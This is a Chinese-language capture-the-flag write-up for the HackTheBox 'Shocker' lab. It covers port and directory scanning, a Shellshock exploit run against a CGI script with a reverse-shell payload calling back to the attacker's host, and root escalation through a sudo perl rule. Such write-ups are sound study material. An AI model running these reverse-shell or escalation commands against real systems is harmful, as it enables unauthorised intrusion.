关于黑客:HTBShockershellsocksudo滥用perl

49次阅读

共计 6099 个字符,预计需要花费 16 分钟才能阅读完成。

免责申明

本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。

服务探测

┌──(root💀kali)-[~/htb/Shocker]
└─# nmap -sV -Pn 10.10.10.56 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-11-30 01:58 EST
Nmap scan report for 10.10.10.56
Host is up (0.35s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1015.68 seconds

80 端口关上就是一个简略页面

目录爆破

──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.56                                                                  

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_|)

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.10.56/_21-11-30_02-12-39.txt

Error Log: /root/dirsearch/logs/errors-21-11-30_02-12-39.log

Target: http://10.10.10.56/

[02:12:41] Starting: 
[02:14:06] 200 -  137B  - /index.html                                       

竟然只有一个动态页面,这就有点郁闷了

再换个弱小点的字典:

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.56 -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_|)

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545

Output File: /root/dirsearch/reports/10.10.10.56/_21-11-30_02-19-12.txt

Error Log: /root/dirsearch/logs/errors-21-11-30_02-19-12.log

Target: http://10.10.10.56/

[02:19:12] Starting: 
[02:31:53] 403 -  299B  - /cgi-bin/                                    
                                                                             
Task Completed

只有一个 cgi-bin 文件夹,咱们用 gobuster,指定 .php,.sh,.html 三种扩展名进行爆破

└─# gobuster dir  --url http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/common.txt -t 30 -x .php,.sh,.html                                                                                                                     1 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/cgi-bin/
[+] Method:                  GET
[+] Threads:                 30
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              sh,html,php
[+] Timeout:                 10s
===============================================================
2021/11/30 05:45:13 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd.html       (Status: 403) [Size: 308]
/.hta.php             (Status: 403) [Size: 302]
/.htaccess            (Status: 403) [Size: 303]
/.htpasswd            (Status: 403) [Size: 303]
/.hta.sh              (Status: 403) [Size: 301]
/.htaccess.php        (Status: 403) [Size: 307]
/.htaccess.sh         (Status: 403) [Size: 306]
/.hta.html            (Status: 403) [Size: 303]
/.htpasswd.php        (Status: 403) [Size: 307]
/.hta                 (Status: 403) [Size: 298]
/.htpasswd.sh         (Status: 403) [Size: 306]
/.htaccess.html       (Status: 403) [Size: 308]
/user.sh              (Status: 200) [Size: 118]
                                               
===============================================================
2021/11/30 05:48:46 Finished
===============================================================

发现一个 user.sh 文件

在浏览器上不能拜访这个文件,然而用 curl 命令能够返回

┌──(root💀kali)-[~/htb/Shocker]
└─# curl -s http://10.10.10.56/cgi-bin/user.sh     
Content-Type: text/plain

Just an uptime test script

 05:48:43 up  3:52,  0 users,  load average: 0.01, 0.03, 0.00

用 nikto 开掘这个脚本可能潜在的破绽信息

┌──(root💀kali)-[~/htb/Shocker]
└─# nikto -h http://10.10.10.56/cgi-bin/user.sh
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.56
+ Target Hostname:    10.10.10.56
+ Target Port:        80
+ Start Time:         2021-11-30 05:53:13 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header '93e4r0-cve-2014-6271' found, with contents: true
+ Uncommon header '93e4r0-cve-2014-6278' found, with contents: true
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /cgi-bin/user.sh/kboard/: KBoard Forum 0.3.0 and prior have a security problem in forum_edit_post.php, forum_post.php and forum_reply.php
+ /cgi-bin/user.sh/lists/admin/: PHPList pre 2.6.4 contains a number of vulnerabilities including remote administrative access, harvesting user info and more. Default login to admin interface is admin/phplist
+ /cgi-bin/user.sh/splashAdmin.php: Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely.
+ /cgi-bin/user.sh/ssdefs/: Siteseed pre 1.4.2 has 'major' security problems.
+ /cgi-bin/user.sh/sshome/: Siteseed pre 1.4.2 has 'major' security problems.
+ /cgi-bin/user.sh/tiki/: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin
+ /cgi-bin/user.sh/tiki/tiki-install.php: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin

2.4.18 版本貌似存在 cve-2014-6271cve-2014-6278破绽

咱们找到这个脚本

把 exp 拷贝到本地,执行攻打

python exp.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.15 lport=4242 pages=”/cgi-bin/user.sh”

拿到初始 shell

┌──(root💀kali)-[~/htb/Shocker]
└─# python exp.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.15 lport=4242 pages="/cgi-bin/user.sh"                                                                                                                               1 ⨯
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 10.10.10.56
10.10.10.56> id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

10.10.10.56> whoami
shelly

在 home 目录拿到 user.txt

提权

查看 sudo 特权,能够无明码应用 perl

10.10.10.56> sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

利用 perl 提权到 root

10.10.10.56> sudo perl -e 'exec"/bin/sh";'
10.10.10.56> id
uid=0(root) gid=0(root) groups=0(root)

10.10.10.56> whoami
root

正文完
 0